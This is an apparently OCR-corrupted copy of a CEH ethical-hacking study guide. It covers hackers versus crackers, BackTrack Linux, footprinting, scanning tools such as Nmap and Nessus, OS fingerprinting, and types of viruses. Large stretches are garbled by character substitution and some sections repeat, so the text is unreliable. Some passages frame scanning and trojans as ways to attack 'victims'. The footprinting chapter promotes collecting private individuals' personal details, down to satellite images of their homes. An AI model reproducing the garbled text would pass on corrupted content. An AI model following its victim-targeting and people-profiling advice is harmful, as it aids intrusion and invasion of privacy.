CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 1/67

CERTIFIED ETHICAL HACKER

Study Guide

copyright © 2016 EAPL 1







d"t"("!e to cr"!h) A! " re!ult+ de&elo#er! "nd u!er! were un"(le to u#lo"d or downlo"d "ny

"##lic"tion!)

DIFFERENCE BETWEEN HACKER AND CRACKER

There "re lot! o "rticle! on internet "(out the dierence (etween Hackers "nd Crackers. For m"ny

ye"r!+ medi" h"! erroneou!ly u!ed the Hacker word with " Cr"c'er) So the gener"l #u(lic now

(elie&e! h"c'er i! !omeone who (re"'! into com#uter !y!tem!+ hacking passwords+ we(!ite! "nd

mi!u!e! them) =ut thi! i! "(!olutely untrue "nd it demor"li;e! !ome o our mo!t t"lented h"c'er!)

The gre"tne!! o mi!conce#tion you c"n determine rom the "ct th"t world>! (igge!t "uthentic !ource

WIKI8EDIA h"! deined h"c'er! in " incorrect w"y) Wi'i#edi" h"! deined h"c'er! in the ollowing

w"y?

“Hacking is nathori!ed se o" co#pter and network resorces. $The ter# “Hacker%

origina&&' #eant a (er' gi"ted progra##er. In recent 'ears thogh) with easier access to

#&tip&e s'ste#s) it now has negati(e i#p&ications.*%

There i! " &ery thin line dierence (etween the h"c'er "nd cr"c'er) Li'e " coin h"! two "ce!

he"d! or t"il!+ !imil"r i! true or com#uter ex#ert!) Some u!e! their techni@ue! "nd ex#erti;e

to hel# the other! "nd !ecure the !y!tem! or networ'! "nd !ome mi!u!e! them "nd u!e th"t or

their own !eli!h re"!on!)

There "re !e&er"l tr"dition"l w"y! th"t determine! the dierence (etween the h"c'er! "ndcr"c'er!) In thi! (oo' we will #ro&ide you the!e w"y! in order o their "cce#t"nce in the

com#uter "nd IT m"r'et) Fir!t o "ll+ let me #ro&ide you the ("!ic deinition! o (oth h"c'er!

"nd cr"c'er!)

These de"initions are as "o&&ows+

Hackers+ A Hacker i! " #er!on who i! extremely intere!ted in ex#loring the thing! "nd

recondite wor'ing! o "ny com#uter !y!tem or networking !y!tem) .o!t oten+ h"c'er! "re

the ex#ert #rogr"mmer!) The!e "re "l!o c"lled Ethica& Hackers or white h"t h"c'er!) And the

techni@ue or h"c'ing they #erorm i! c"lled ethic"l h"c'ing)

Ethic"l H"c'ing .e"n! you thin' li'e H"c'er!) i)e Fir!t you H"c' the Sy!tem! "nd ind out

the loo# hole! "nd then try to correct tho!e Loo# Hole!+ The!e ty#e! o h"c'er! #rotect the

cy(erworld rom e&ery #o!!i(le thre"t "nd ixe! the uture coming !ecurity loo# hole!) The!e

#eo#le! "re "l!o c"lled "! G2R2>!B o Com#uter Security)

Crackers+ A Crackers or Black Hat hackers or cheaters or simply criminals, they are

called criminals because they are having the mind-set of causing harm to security and they




steals very useful data and use it in wrong ways. Phishers also come in this category who

steals account info and steal your credit card nos. and money over the Net.

Below is the Diagrams which shows the basic difference between cracker or black hat hackers

and Hackers or ethical hackers or white hat hackers.

e hope this will help you to clear most of your doubts about hackers and crackers. !nd the

most important thing, until and unless an ethical hacker thinks like a cracker you can never

become an e"pert ethical hacker because to get most out of any computer system you must

understand the mind-set of crackers that what they can do and up to what level they can

damage.

Now when you will identify the vulnerabilities and loopholes, #f you fi"es them so that in

future anyone cannot breach that same vulnerability then you are Hacker or ethical hacker or

hite Hat hacker and if you utili$e that loophole of misdeeds or for fun then its cracking or

Black hat hacking. !nd black hat hackers are intelligent peoples but criminals or simply

cyber cops call them evil genius.

BE,T -ERATIN/ ,0,TE1 F-R HACKER,

.o!t o u!er! conu!ed "(out which o#er"ting !y!tem i! (e!t or h"c'er! "nd or doing

h"c'ing "cti&itie! li'e h"c'ing wirele!! networ' #"!!word!+ networ' !nier!+ re&er!e

engineering tool!+ "##lic"tion h"c'ing tool! "nd other encry#ting "nd !#ooing h"c'ing tool!)

Here we !ugge!t o#er"ting !y!tem i! ="c'tr"c' or '"li Linux)




=ut you c"n "l!o gi&e " try to ."triux 1#er"ting Sy!tem "nd 'no##ix+ ."triux 1S i! *u!t

"we!ome (ut it>! !till under con!truction "! de!igner! "re !till wor'ing on it "nd #"tching it)

-ow let>! di!cu!! more "(out unction"lity o ="c'tr"c' o#er"ting !y!tem)

Best -perating ,'ste#+ Backtrack 2in3

="c'Tr"c' i! " Linux/("!ed #enetr"tion te!ting "r!en"l th"t "id! !ecurity #roe!!ion"l! in the

"(ility to #erorm "!!e!!ment! in " #urely n"ti&e en&ironment dedic"ted to h"c'ing)

Reg"rdle!! i you>re m"'ing ="c'Tr"c' your #rim"ry o#er"ting !y!tem+ (ooting rom " Li&e

D6D+ or u!ing your "&orite thum( dri&e+ ="c'Tr"c' h"! (een cu!tomi;ed down to e&ery

#"c'"ge+ 'ernel conigur"tion+ !cri#t "nd #"tch !olely or the #ur#o!e o the #enetr"tion te!ter)

="c'Tr"c' i! intended or "ll "udience! rom the mo!t !"&&y !ecurity #roe!!ion"l! to e"rly

newcomer! to the inorm"tion !ecurity ield) ="c'Tr"c' #romote! " @uic' "nd e"!y w"y to

ind "nd u#d"te the l"rge!t d"t"("!e o !ecurity tool collection to/d"te)

="c' Tr"c' i! @uite #o!!i(ly the mo!t com#rehen!i&e Linux di!tri(ution o !ecurity tool!)

=oth h"c'er! "nd cr"c'er! c"n "##reci"te the e"ture! o thi! di!tri(ution) For (l"c'/h"t

h"c'er!+ it #ro&ide! "n e"!y "cce!! to !otw"re th"t "cilit"te! ex#loit"tion! or !ecured

!y!tem! "nd other re&er!e engineering) For white/h"tter!+ it i! " #enetr"tion te!ter th"t ind!

hole! in " !ecurity !cheme) See+ e&ery(ody win!$

Major Features of BackTrack Linux




Back%rack features the latest in security penetration software. %he current &inu"

kernel is patched so that special driver installation is unnecessary for attacks. 'or

e"ample, an !theros-based wireless networking adapter will no enter monitor mode

or in(ect packets without the )adi'i driver patch. ith Back%rack, you don*t need

to worry about that. #t*s (ust plug-and-play ready-to-go+ hat*s great is that this &inu" distribution comes &ive-on-D. o, no installation is

needed. However, what you e"perience Back%rack, you will reali$e that it is a must to

download this operating system and install it on your &aptop. !t the very least,

download the )are irtual !ppliance for Backtrack. )ake sure you also install

the )are %ools for &inu" as well. )any features will still work in )are mode.

• Based on/ Debian, 0buntu

• 1rigin/ wit$erland

• !rchitecture/ i234

• Desktop/ 'lu"bo", 5D6• ategory/ 'orensics, 7escue, &ive )edium

• ost/ 'ree

Hacking Tools:

Back%rack provides users with easy access to a comprehensive and large collection of

security-related tools ranging from port scanners to password crackers. upport for

&ive D and &ive 0B functionality allows users to boot Back%rack directly from

portable media without re8uiring installation, though permanent installation to hard

disk is also an option.

Back%rack includes many well known security tools including/

• )etasploit integration

• 7')1N #n(ection capable wireless drivers

• 5ismet

• Nmap

• 6ttercap

• ireshark 9formerly known as 6thereal:

• Be6' 9Browser 6"ploitation 'ramework:

! large collection of e"ploits as well as more common place software such as

browsers. Back%rack arranges tools into ;; categories/

• #nformation <athering

• Network )apping

• ulnerability #dentification

• eb !pplication !nalysis

• 7adio Network !nalysis 93=>.;;, Bluetooth, 7fid:

• Penetration 96"ploit ? ocial 6ngineering %oolkit:

• Privilege 6scalation

• )aintaining !ccess




• Digital 'orensics

• 7everse 6ngineering

• oice 1ver #P

CHATER 4 5 F--T RINTIN/

Foot#rinting "nd How It c"n (e Hel#Ful to H"c' !y!tem!








4) -ow you c"n u!e thi! inorm"tion to !e"rch more "(out 8er!on u!ing Sim#ly google "!

!hown in next !n"#!hot))




-ow It! on you need How much ino u w"nt to ex#lore "(out the #er!on "nd we(!ite which u

w"nt to h"c'?




I thin' you "ll Will Li'e Thi!!!?) WE will continue 1ur Di!cu!!ion on F11T8RI-TI-G

tomorrow "l!o? A! It i! the .o!t Im#ort"nt 8h"!e?))

We will Ex#lore .ore Inorm"tion in the -ext cl"!!?) I will ex#l"in Few .ore intere!ting

"ct! "nd inorm"tion ex#loring thing! !o re"d on?

7NEARTHIN/ BA,IC INF-R1ATI-N

Fir!t o "ll We will ocu! on 2ne"rthing the ="!ic Inorm"tion "(out the !ite? i)e the I8 "nd

!er&er inorm"tion!))

I will Show you with the hel# on !n"#!hot! ,

Fir!t go to START R2- Mty#e cmdMthen ty#e tr"cert www)we(!iten"me)com

Here we will u!e two ("!ic comm"nd! in comm"nd 8rom#tcmd, tr"cert

www)we(i!teto(e"nly!ed)com

"nd #ing www)we(!iten"me)com

It will loo' !omething li'e thi!,

We tr"ce routed www)"muli&e)com

3) Show! 1ur G"tew"y o connecti&ity)4) Show! our 1utgoing Foot#rint I#i)e the our I8 th"t i! (eing "n"ly;ed (y we(!ite

5) Show! Connecti&ity #"!!e! through which !er&ice 8ro&ider) I u!e! =S-L (ut it! !howing

"irtel (ec"u!e I #reer D-S o Airtel or !uring Nuic')

-ext !te#! !howing the I#>! o We(!er&er! through which "muli&e i! (eing m"int"ined)

Ater Thi! We will c"me to now the I8 o the We(!ite "nd I# o it; we( !er&er! which "re

(eing u!ed urther)

we(!ite I# c"n (e u!ed to g"ther more inorm"tion "(out the we(!ite))




How to Find The ersona& In"or#ation A6ot the Indi(ida& -(er Net 88

It! one o the .o!t im#ort"nt t"!') It! "l!o hel#ul in inding the "'e #roile!? =ut

unortu"ntely thi! i! limited =ut we c"n u!e it to the .o!t? There "re two we(!ite which

will hel# u!?

3) htt#,#eo#le)y"hoo)com (e!t Site To tr"ce 8eo#le or their 8er!on"l Inorm"tion "nd "l!ore&er!e 8hone or mo(ile num(er Loo' u#

4) htt#,www)intelliu!)com =ut thi! !ite i! limited to 2S only

S"m#le Re#ort rom Intelliu! ,




S"tellite 8icture o Ooe>! Hou!e rom Intelliu!,

-ow 2!ing the!e Site! you will (e "(le to collect the #er!on"l inorm"tion o the indi&idu"l!

"nd "l!o (eing "(le to identiy the "'e #roile!))

T--2, NEEDED F-R F--TRINTIN/ +

%ou c"n "&oid "(o&e hectic wor' (y u!ing thi! tool , S#iderFoot

Downlo"d lin', htt#,www)(in"ry#ool)com!#ideroot

Inorm"tion "(out S#iderFoot,

S#iderFoot i! " ree+ o#en/!ource+ dom"in oot#rinting tool) Gi&en one or multi#le dom"in

n"me! "nd when I !"y dom"in!+ I>m reerring to the D-S 'ind+ not Window! dom"in!+ it

will !cr"#e the we(!ite! on th"t dom"in+ "! well "! !e"rch Google+ -etcr"t+ Whoi! "nd D-S

to (uild u# inorm"tion li'e,

• Su(dom"in!

• Aili"te!

• We( !er&er &er!ion!

• 2!er! i)e) Pu!er

• Simil"r dom"in!




• Em"il "ddre!!e!

• -et(loc'!

ADDITI-NA2 F--TRINTIN/ T--2, +

-ote "ll the!e tool! "re reew"re! )) 2 c"n e"!ily google then "nd downlo"d the!e))

• Whoi!• -!loo'u#

• ARI-

• -eo Tr"ce

• 6i!u"lRoute Tr"ce

• Sm"rtWhoi!

• e."ilTr"c'er8ro

• We(!ite w"tcher

• Google E"rth

• GE1 S#ider • HTTr"c' We( Co#ier

• E/m"il S#ider

Thi! i! "ll "(out Foot#rinting ) -ow 2!e the G"thered inorm"tion to m"'e ("!ic

Det"iled Inorm"tion "(out the We(!ite#er!on?




CHATER 4 9 ,CANNIN/ NETW-RK,

Sc"nning "nd Att"c'ing 1#en 8ort!

In Sc"nning 8"rt We Will Co&er the Following To#ic! in det"il! ,

P Deinition o !c"nning

P Ty#e! "nd o(*ecti&e! o Sc"nning

P 2nder!t"nding Sc"nning methodology

P Chec'ing li&e !y!tem! "nd o#en #ort!

P 2nder!t"nding !c"nning techni@ue!

P Dierent tool! #re!ent to #erorm Sc"nning

P 2nder!t"nding ("nner gr"((ing "nd 1S inger#rinting

P Dr"wing networ' di"gr"m! o &ulner"(le ho!t!

P 8re#"ring #roxie!

P 2nder!t"nding "nonymi;er!

P Sc"nning counterme"!ure!

What Is ,canning 88 And Wh' We Focs -n that 8

Sc"nning "! rom the n"me me"n! th"t we will !c"n !omething to ind !ome det"il! etc etc?

Sc"nning ("!ic"lly reer! to the g"thering o ollowing our inorm"tion!?

We Sc"n !y!tem! or our ("!ic #ur#o!e! ,/




• To ind !#eciic I8 "ddre!!

• 1#er"ting !y!tem

• Sy!tem Architecture

• Ser&ice! Running on !y!tem

The &"riou! ty#e! o !c"nning "re "! ollow!,

P8ort Sc"nning

P-etwor' Sc"nning

P6ulner"(ility Sc"nning

I w"nt to Deine The!e Term! here 1nly "! they "re o gre"t u!e in urther tutori"l?

-RT ,CANNIN/ , There "re :7' #ort! in " com#uter out o which 3' "re ixed or !y!temor 1S !er&ice!) In 8ort !c"nning we !c"n or the o#en 8ort! which c"n (e u!ed to "tt"c' the

&ictim com#uter)

In 8ort !c"nning " !erie! o me!!"ge! !ent to (re"' into " com#uter to le"rn "(out the

com#uter>! networ' !er&ice!) Through thi! we will 'now th"t which #ort we will u!e to "tt"c'

the &ictim))

Network ,canning , -etwor' !c"nning i! ("!ic"lly " #rocedure o inding the "cti&e ho!t! on

the -etwor')

i)e We trie! to ind th"t !y!tem i! !t"nd"lone or multiu!er?

Thi! i! done either or the #ur#o!e o "tt"c'ing them or or networ' !ecurity "!!e!!ment i)e

how !ecured the networ' I!

:&nera6i&it' ,canning , A! rom the n"me + In thi! ty#e o !c"nning We !c"n the !y!tem!

or inding the &ulner"(ility i)e the we"'ne!! in 1Sd"t"("!e ? 1nce we ind the

&ulner"(ility or loo# hole we c"n utili;e it to =e!t))"nd "tt"c' the &ictim through th"t ?

-B;ECTI:E, -F ,CANNIN/

The!e "re 8rim"ry o(*ecti&e! o !c"nning i)e why do we do !c"nning ,

P To detect the li&e !y!tem! running on the networ')

P To di!co&er which #ort! "re "cti&erunning)

P To di!co&er the o#er"ting !y!tem running on the t"rget !y!tem inger#rinting)

P To di!co&er the !er&ice! running on the t"rget !y!tem)

P To di!co&er the I8 "ddre!! o the t"rget !y!tem)

We will #reer T11LS or thi! (ec"u!e they will reduce our Hectic Wor'? The ir!t Tool

th"t we 2!e i! the N1A +

D1W-L1AD ,htt#,nm"#)orgdi!tnm"#/9)/!etu#)exe


http://nmap.org/dist/nmap-5.00-setup.exe

http://nmap.org/dist/nmap-5.00-setup.exe



Featres o" N1A +

P -m"# i! u!ed to c"rry out #ort !c"nning+ 1S detection+ &er!ion detection+ #ing !wee#+ "nd

m"ny other techni@ue!)

P It !c"n! " l"rge num(er o m"chine! "t one time)

P It i! !u##orted (y m"ny o#er"ting !y!tem!)

P It c"n c"rry out "ll ty#e! o #ort !c"nning techni@ue!)

,EC-ND T--2 I, NET T--2, <.=.>= +

It; i! " collection o &"riou! -etwor'ing Tool! ? mu!t or (eginner!?

D1W-L1AD, htt#,www)!ot#edi")com#rogDownlo"d-et/Tool!/Downlo"d/4435)html

P -et Tool! Suite 8"c' i! " collection o !c"nning tool!)

P Thi! tool!et cont"in! ton! o #ort !c"nner!+ looder!+ we( ri##er!+ "nd m"!! e/m"iler!) -ote, Some o the!e tool! m"y not Wor' (ut !ome "re too good)







Fir!t o Which i! 1S Finger#rinting?

What is -, Fingerprinting 88

1S inger#rinting i! the method to determine the o#er"ting !y!tem th"t i! running on the

t"rget !y!tem)

The two dierent ty#e! o inger#rinting "re,

Q Acti&e !t"c' inger#rinting

Q 8"!!i&e inger#rinting

Acti(e ,tack Fingerrinting+

="!ed on the "ct th"t 1S &endor! im#lement the TC8 !t"c' dierently)S#eci"lly cr"ted

#"c'et! "re !ent to remote 1S! "nd re!#on!e i! noted) The re!#on!e! "re then com#"red with

" d"t"("!e to determine the 1S)

assi(e Fingerrinting+

8"!!i&e ("nner gr"((ing reer! to indirectly !c"nning " !y!tem to re&e"l it! !er&er>! o#er"ting

!y!tem)

It i! "l!o ("!ed on the dierenti"l im#l"nt"tion o the !t"c' "nd the &"riou! w"y! "n 1S

re!#ond! to it)

It u!e! !niing techni@ue! in!te"d o the !c"nning techni@ue!) It i! le!! "ccur"te th"n "cti&e

inger#rinting)

T--2 7,ED F-R -, FIN/ERRINTIN/ +p=" -s Fingerprinting Too&

D-WN2-AD+

htt#,lc"mtu)coredum#)cx#/win54);i#

8 &4 i! " &er!"tile #"!!i&e 1S inger#rinting tool) 8 c"n identiy the o#er"ting !y!tem on,

• m"chine! th"t connect to your (ox S%- mode+

• m"chine! you connect to S%-ACK mode+

• m"chine you c"nnot connect to RST mode+

• m"chine! who!e communic"tion! you c"n o(!er&e)

8 c"n "l!o do m"ny other tric'!+ "nd c"n detect or me"!ure the ollowing,

• irew"ll #re!ence+ -AT u!e u!eul or #olicy enorcement+

• exi!tence o " lo"d ("l"ncer !etu#+

• the di!t"nce to the remote !y!tem "nd it! u#time+

• other guy>! networ' hoo'u# DSL+ 1C5+ "&i"n c"rrier! "nd hi! IS8)




What is :&nera6i&it'888

A! I h"&e Told in Fir!t cl"!! th"t 6ulner"(ility i! we"'ne!! in the networ'+!y!tem+d"t"("!e

etc? We c"n c"ll &ulner"(ility "! the Loo#hole i)e through which &ictim c"n (e "tt"c'ed)) We

ir!t "n"ly;e the loo#hole "nd then try to u!e it to (e!t to H"c' the Sy!tem o &ictim or

or"g"ni!"tion or we(!ite?

T--2 THAT WE 7,E F-R :72NERABI2IT0 ,CANNIN/ ARE +

3) -e!!u!

4) Retin"

NE,,7,

The Nesss &ulner"(ility !c"nner+ i! the world/le"der in "cti&e !c"nner!+ e"turing high

!#eed di!co&ery+ conigur"tion "uditing+ "!!et #roiling+ !en!iti&e d"t" di!co&ery "nd

&ulner"(ility "n"ly!i! o your !ecurity #o!ture) -e!!u! !c"nner! c"n (e di!tri(uted throughout

"n entire enter#ri!e+ in!ide D.!+ "nd "cro!! #hy!ic"lly !e#"r"te networ'!)




Fe"ture!,

P 8lug/in/"rchitecture

P -ASL -e!!u! Att"c' Scri#ting L"ngu"ge

P C"n te!t unlimited num(er o ho!t! !imult"neou!ly

P Sm"rt !er&ice recognition

P Client/!er&er "rchitecture

P Sm"rt #lug/in!

P 2#/to/d"te !ecurity &ulner"(ility d"t"("!e

,A12E ,NA,H-T+




D-W

N2-AD NE,,7, +

htt#,www)ne!!u!)orgdownlo"d

RETINA

Retin" -etwor' Security Sc"nner+ the indu!try "nd go&ernment !t"nd"rd or multi/#l"torm

&ulner"(ility m"n"gement+ identiie! 'nown "nd ;ero d"y &ulner"(ilitie! #lu! #ro&ide!

!ecurity ri!' "!!e!!ment+ en"(ling !ecurity (e!t #r"ctice!+ #olicy enorcement+ "nd regul"tory

"udit!)






D-WN2-AD RETINA+

htt#,www)eeye)comhtml#roduct!retin"downlo"dindex)html

-ow Ater Sc"nning the Sy!tem! or 6ulner"(ilite! )) We will -ow Going to "tt"c' the

Sy!tem! (ut (eore thi! we !hould 'now the Ri!' ) Thi! ri!' c"n (e reduced to gre"t extent (yu!ing 8roxie!)) In -ext Cl"!! We will Di!cu!! wh"t "re 8roxie! "nd How they wor' "nd how

they "re going to Hel# u! "nd !ome undetect"(le "nd untr"ce"(le 8roxy !er&er!?

SCANNING AND ATTACKING OPEN PORTS

In my Previous class I have explained about footprinting i.e getting the IP of the

Person/website/organisation whom you want to attack and extracting the personal

Information.. You all were thinking that what was the use of that .. In this class you will

came to know why we have undergo footprinting and analysis part…

In Scanning Part e ill !over the "ollowing #opics in details $

% &efinition of scanning

% #ypes and ob'ectives of Scanning

% (nderstanding Scanning methodology

% !hecking live systems and open ports

% (nderstanding scanning techni)ues

% &ifferent tools present to perform Scanning

% (nderstanding banner grabbing and *S fingerprinting

% &rawing network diagrams of vulnerable hosts% Preparing proxies




% (nderstanding anonymi+ers

% Scanning countermeasures

What Is Scanning ?? And WhyWe Focus On that ?

Scanning as from the name means that we will scan something to find some details etc

etc… Scanning basically refers to the gathering of following four informations…

e Scan systems for four basic purposes $,

• #o find specific IP address

• *perating system

• System -rchitecture

• Services unning on system

#he various types of scanning are as follows$

%Port Scanning

%etwork Scanning

%0ulnerability Scanning






% It can carry out all types of port scanning techni)ues.

S$CON( TOO) IS N$T TOO)S*+,+-, &

It+ is a collection of various etworking #ools … must for beginners…

&*:*-&$ http$//www.softpedia.com/prog&ownload/et,#ools,&ownload,>>[email protected]

% et #ools Suite Pack is a collection of scanning tools.

% #his toolset contains tons of port scanners6 flooders6 web rippers6 and mass e,mailers.

ote$ Some of these tools may not ork but some are too good.




I thisnk that4s Anough for #oday .e will discuss more on scanning tomorrow (ntil You

try these tools..

If you have any problem in (sing these tools then you can ask me ..I will help you use

these tools…




INTR-D7CTI-N T- TR-;AN,) :IR7,E, AND BACKD--R,

Welcome ="c' Guy!+ Ater " he"&y =u!y Schedule I come with the -ext H"c'ing Tutori"l) Ithin' e&ery(ody who i! u!ing com#uter h"! "ced the #ro(lem o &iru!e! "t le"!t once in lie)

In tod"y>! Cl"!! I will going to Introduce Wh"t "re Tro*"n!+ 6iru!e!+ ="c'door!+ worm! etc)

And How they wor' to inect the !y!tem) In l"ter cl"!!e! we will di!cu!! more "(out them

Li'e How to Get rid o 6iru!e!+ Tro*"n! etc) How to remo&e them "nd the .o!t Im#ort"nt

How to 2!e them or H"c'ing 6ictim! !y!tem! etc)) So Guy! Kee# Re"ding))

Let! St"rt With 6iru!e!? Wh"t "re The!e "nd How they Wor'))

:IR7,E,+

6iru! i! " !el/re#lic"ting #rogr"m th"t #roduce! it! own code (y "tt"ching co#ie! o it!el

into other execut"(le code! li'e executi&e ile!)exe +Dyn"mic lin' Li(r"ry>!)dll! etc))

6iru! Gener"lly o#er"te! in the ("c'ground "nd ocour!e without the De!ire o the 2!er "!

-oone w"nt th"t &iru! to h"rm their com#uter))R1FL ,8

,o#e We&&?known Characteristics o" :irses+

• Re!ide! in the memory "nd re#lic"te! it!el while the #rogr"m where it "tt"ched i!

running

• Doe! not re!ide in the memory "ter the execution o #rogr"m

• C"n tr"n!orm them!el&e! (y ch"nging code! to "##e"r dierent






Fig, Inection 8h"!e th"t how ile i! "tt"ched to )exe ile! to inect 8rogr"m!)

Fig, Att"c' 8h"!e th"t how the File! "re got Fr"gmented "nd !y!tem !#eed Slow! Down






DIFFERENCE BETWEEN W-R1, AND :IR7,E,

.o!t o u! thin'! th"t worm! "re &iru!e! "nd their wor'ing i! !imil"r to &iru!e! (ut thi! not

the re"l !cen"rio) There i! " =ig dierence (etween the gener"l &iru!e! "nd Worm!)

A worm i! " !#eci"l ty#e o &iru! th"t c"n re#lic"te it!el "nd u!e memory+ 6t cannot

attach itse&" to other progra#s) A worm !#re"d! through the inected networ'

"utom"tic"lly (ut " &iru! doe! not)

How To Detect 0or ,'ste# is In"ected 6' :irs88

Thi! i! one o the m"*or @ue!tion to "n!wer "nd the !im#le!t "n!wer to it i! th"t there "re

!ome Gener"l Indic"tion! th"t Indic"te! th"t Sy!tem i! inected or -ot)

Gener"l Indic"tion! "re !t"ted =elow,

• 8rogr"m! t"'e longer to lo"d th"n norm"l (ec"u!e &iru! h"lt! the norm"l wor'ing o

#rogr"m! "! it "tt"che! it!el to it+ !o the execution time incre"!e! )

• Com#uter>! h"rd dri&e con!t"ntly run! out o ree !#"ce)

• File! h"&e !tr"nge n"me! which "re not recogni;"(le)

• 8rogr"m! "ct err"tic"lly 8rogr"m! Gi&e! error! on u!e

Re!ource! "re u!ed u# e"!ily c"n (e E"!ily &iewed u!ing t"!' m"n"ger)

H-W THE :IR7, D-E, INFECT, THE ,0,TE188

6iru!e! inect the !y!tem in the ollowing w"y!,

3) Lo"d! it!el into memory "nd chec'! or execut"(le on the di!')

4) A##end! the m"liciou! code to " legitim"te #rogr"m which i! Im#ort"nt to the u!er)

5) Since the u!er i! un"w"re o the re#l"cement+ he!he l"unche! the inected #rogr"m)

7) A! " re!ult o the inected #rogr"m (eing execute!+ other #rogr"m! get inected "!

well)9) The "(o&e cycle continue! until the u!er re"li;e! the "nom"ly within the !y!tem)




,TA/E, -F :IR7, 2IFE C0C2E FR-1 DE,I/N T- E2I1INATI-N

The lie cycle indic"ted "(o&e i! " gener"l lie cycle o the 6iru! rom de!ign 8h"!e to

Elimin"tion #h"!e?

:IR7, C2A,,IFICATI-N 4 T0E, -F :IR7,E,

6iru!e! "re cl"!!iied on the ("!i! o two ("!ic Thing!,

3) Wh"t they Inect

4) How they inect

Ex"m#le!,

,'ste# ,ector or Boot :irs+

? Inect! di!' (oot !ector! "nd record!)

Fi&e :irs+

? Inect! execut"(le in 1S ile !y!tem)

1acro :irs+

? Inect! document!+ !#re"d!heet! "nd d"t"("!e! !uch "! word+ excel "nd

"cce!!) ,orce Code




:irs+

? 1&erwrite! or "##end! ho!t code (y "dding Tro*"n code in it)

Network :irs+

QS#re"d! it!el &i" em"il (y u!ing comm"nd "nd #rotocol! o com#uter

networ')

Different Types of Virus and Worms Explained

System Sector Virusesystem sectors are special areas on your disk containing programs that are e"ecuted when you boot

9start: your P. ystem sectors 9)aster Boot 7ecord and D1 Boot 7ecord: are often targets

for viruses. %hese boot viruses use all of the common viral techni8ues to infect and

hide themselves. %hey rely on infected floppy disk left in the drive when the computer starts, they can

also be @droppedA by some file infectors or %ro(ans.

Stealth Virus

%hese viruses evade anti-virus software by intercepting its re8uests to the operating system.

! virus can hide itself by intercepting the anti-virus software*s re8uest to read the file and passing there8uest to the virus, instead of the 1. %he virus can then return an uninfected version of the file to

the anti-virus software, so that it appears as if the file is @cleanA.

Bootable CD-ROM VirusThese are a new type of virus that destroys the hard disk data content when booted with the infected

CD-R!"

Example# $omeone mi%ht %ive you a &'()* +T,+&E CD-R!"

When you boot the computer usin% the CD-R! all your data is %one" (o ,nti-virus can stop this

because ,V software or the $ is not even loaded when you boot from a CD-R!"

Self-Modificatio Virus!ost modern antivirus pro%rams try to find virus-patterns inside ordinary pro%rams by scannin% them

for virus si%natures"

, si%nature is a characteristic byte-pattern that is part of a certain virus or family of viruses"

$elf-modification viruses employ techni.ues that make detection by means of si%natures difficult or

impossible" These viruses modify their code on each infection" /each infected file

contains a different variant of the virus0

Pol!"or#$ic Code Viruscopyright © 2016 EAPL 37



, well-written polymorphic virus therefore has no parts that stay the same on each infection"To enable

polymorphic code the virus has to have a polymorphic en%ine /also called mutatin% en%ine or

mutation en%ine0" 1olymorphic code is a code that mutates while keepin% the ori%inal al%orithm intact"

Meta"or#$ic Virus!etamorphic viruses rewrite themselves completely each time they are to infect new executables"

!etamorphic code is a code that can repro%ram itself by translatin% its own code into a temporary

representation and then back to normal code a%ain"

2or example W345$imile consisted of over 67888 lines of assembly code 98: of it is part of the

metamorphic en%ine"

%ile E&tesio Virus2ile extension viruses chan%e the extensions of files" "T*T is safe as it indicates a pure text file" With

extensions turned off if someone sends you a file named +,D"T*T"V+$ you will only see +,D"T*T"'f

you;ve for%otten that extensions are actually turned off you mi%ht think this is a text file and open

it" This is really an executable Visual +asic $cript virus file and could do

serious dama%e "

Countermeasure is to turn off <=ide file extensions> in Windows"




=ow to stop virus or tro?an attacks

If you want to know that your system is either infected by viruses and tro'ans then these

are certain techni)ues to know that$

3. Your !omputer might be running slow usual than normal.

>. Some programs might open without your permission.

@. System start up takes too much time to start.

2. 0arious Arror messages appear on Screen when you open something or without

opening also.

<. System registry has been disabled or folder options is missing.

1. #he most important antivirus shows messages of detecting viruses time to time.

B. hile scanning your system from any antivirus or anti spyware tool its showing

viruses and you noticed that viruses are not deleting.

and much more…

;ave you ever think about the reason why your system is got infected. hat has

infected your system and if its done by any of your friend ;ow he has done it. Surely o6

or in some cases you have tried to find the answer but you are not able to get proper

answer. 7ut story is different here 6 I will tell all the ways ;ow your system can be Cet

infected and ;ow you can protect it if its already infected ;ow you can resolve the

problem. So here are few things ;ow your System got Infected 6 some might be knowing

this but by some reason they have ignored them.

.ow a Syste/ is got In'ected !ecause toNegigence?

0+ 1sing Cracked Versions o' so'tware s2eciay security ones ike anti3irus4

anti5s2yware etc+

hy I have said this is the first and ma'or cause of infection because of the following

simple reason that -ll hackers know that general internet user public always searches for

cracked versions of software4s and wishes to use them for free and ;acker take benefit

of them. You all now be thinking how it help hackers. e know that almost all antivirus

show each and every keygen as virus or some tro'an depending upon its type. ow if we

all know that then how come hackers will forget this fact so what they do they attachestro'ans and viruses to these files and at the time hen your antivirus shows it as virus




you ignores the alert and keep the keygen means tro'an running.

*#A$ -nd Cuys an important note for you all6 If your antivirus doesn4t show any keygen

or crack as a virus then don4t ever think that its not a virus but its a most dangerous

thing. hy dangerous because now ;acker has used some more brain to fool you that is

he has made the virus undetectable simply edit the hex code of original virus. So what is

the moral of story Please don4t use cracked versions.

ow you all be thinking that if we don4t use the cracked versions then how we will able

to get full versions of the software4s. &on4t worry when I am there no fear drink beer and

en'oy everything for free. Its solution will be in solutions step 'ust read article.

6+ Pen dri3e or 1S" dri3e &

#he biggest cause of infection of your system is usb drives and external hard disks.

ow how a virus enters into your system using (S7 drives. You have connected your

(S7 drive to your friends computer and by chance 8sorry its for sure i.e 3==D9 your

friends system is infected by virus or #ro'ans and its the property of 0irus that it

replicates itself using memory. So when you connect your (S7 to your friends computer

your (S7 is now infected by virus and now when you connect this (S7 to your P! using

the property of your indows that it searches the files in ewly connected device and

autorun the device and for doing this it loads the index of your (S74s file system into

Eemory and now if (S7 has virus its the property of virus its replicates itself using

system memory. ow if you are using good antivirus 6 your antivirus will pop warning

and alert messages and some times you ignores them means your system is also

infected. "or (S7 drive virus solution keep reading article.

7+ (ownoading things 'ro/ 1nknown Sites&

Eost of the users searches for thing over the internet and where ever they find their

desired result means file that they want they start downloading that from that site only.

ow how it affects your system suppose you want to download any wallpaper say Fatrina

Faif. ow hackers know the fact that Fatrina has a huge fan following and user will

surely going to download it. #hen what they do they simply bind their malicious codes

with some of files and when users download it his system is infected and he can never

imagine that the virus has come from wallpaper that he has downloaded from unknown

site. "or its solution read on article.

8+ The /ost i/2ortant one "eco/ing a .acker ike %e 9ROF) !ut its truth:+

hy I have mentioned this you might be clear from the above discussion. Eost of the

internet users always curious to know ways how can i hack my friends email account or

